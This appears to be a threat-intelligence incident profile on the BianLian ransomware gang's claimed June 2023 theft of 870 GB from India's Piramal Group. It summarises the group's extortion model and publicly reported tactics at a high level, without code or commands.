Cyber Incident Victim: Piramal Group
Date:
Jun 2023
Location:
India
Summary
The BianLian ransomware gang claimed a cyber attack against the Indian conglomerate Piramal Group, alleging they had accessed 870 GB of sensitive data. The compromised information reportedly included financial and accounting records, project data, technical details, and personal information. The group employs an exfiltration-based extortion model, threatening to release stolen data unless a ransom is paid, and is known for using aggressive pressure tactics.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 1 motive | 2 techniques |
| Threat Actor | Type | Location |
|---|---|---|
| 1 actor | Available to members | Available to members |
Description
On June 28, 2023, the ThreatMon Threat Intelligence team reported an alleged cyber attack targeting the Piramal Group, an Indian business conglomerate with a global presence. The threat intelligence service Falcon Feeds subsequently confirmed the incident. The BianLian ransomware gang claimed responsibility for this attack by listing the Piramal Group as a victim on its data leak site. The group did not specify which of the conglomerate's numerous business divisions it had targeted in its post. The Piramal Group itself did not release an official statement regarding the incident at the time it was reported. The Corporate Communications and Investor Relations & Sustainability teams of the Piramal Group were contacted for an official confirmation but had not provided a reply by the time the initial report was published.
According to the claims made by the BianLian group on its leak site, the threat actors had successfully exfiltrated approximately 870 gigabytes of data from the Piramal Group's network. The allegedly stolen data was described as including sensitive financial information, accounting details pertaining to other companies, project data, technical specifications, and personal information. The BianLian ransomware gang is a prolific cybercrime group that has been active since at least 2019. The group is known for its exfiltration-based extortion model. Initially, BianLian employed a double-extortion tactic, which involved both encrypting victims' systems and stealing data. However, around January 2023, the group shifted its primary focus to solely exfiltrating data and threatening to release it publicly unless a ransom was paid.
The techniques used by the BianLian group to gain initial access to victim networks are varied and include phishing emails, the use of exploit kits, and conducting remote desktop protocol (RDP) brute-force attacks. Once access is obtained, the actors engage in a detailed process of network intrusion. They implant custom backdoors that are written in the Go programming language to maintain persistence within the compromised environment. The group also installs various types of remote management and access software to facilitate control over the systems. To further establish their foothold, they create new local administrator accounts or activate existing ones that may have been disabled.
A key part of the BianLian group's operational playbook involves actively working to evade detection by security tools. They use PowerShell and Windows Command Shell scripts to disable antivirus software running on the compromised machines. They also modify settings within the Windows Registry to weaken the system's defenses. The actors then perform extensive network and Active Directory enumeration to understand the layout of the environment and identify valuable targets. They harvest credentials from the compromised systems, which allows them to move laterally across the network with greater ease and access additional systems and data stores.
During the data theft stage, the BianLian group searches for sensitive files using tailored PowerShell scripts. Once identified, this data is exfiltrated from the network using common file transfer methods. The group has been observed using File Transfer Protocol (FTP), the command-line program Rclone, and the Mega file-sharing service to move the stolen data to external servers under their control. In attacks where they still deploy encryption, the group encrypts files with a distinct extension, '.bianlian', and leaves a ransom note in every affected directory. The group employs additional pressure tactics to compel victims to pay; these include printing the ransom note to printers connected to the compromised network and making threatening telephone calls directly to employees of the victim company.
The ultimate threat posed by the BianLian group is the public release of the exfiltrated data on a leak site that they maintain on the Tor network. This is their primary lever for extortion, especially following their shift away from routine encryption. The Piramal Group incident was not an isolated event for the threat actor around this time. Other recent victims claimed by the BianLian ransomware gang included Mitcon Consultancy, St. Rose Hospital, and the Australian Real Estate Group (AREG). The significant volume of data allegedly stolen from Piramal, at 870 GB, indicated a major breach with potential consequences across its diverse business units, which include pharmaceuticals, financial services, real estate, and a large philanthropic foundation. The potential exposure of financial data, third-party accounting information, and personal details posed serious risks of financial fraud, reputational damage, and regulatory scrutiny. The full impact of the incident, including whether any data was published or a ransom was paid, was not publicly disclosed at the time of the initial reporting.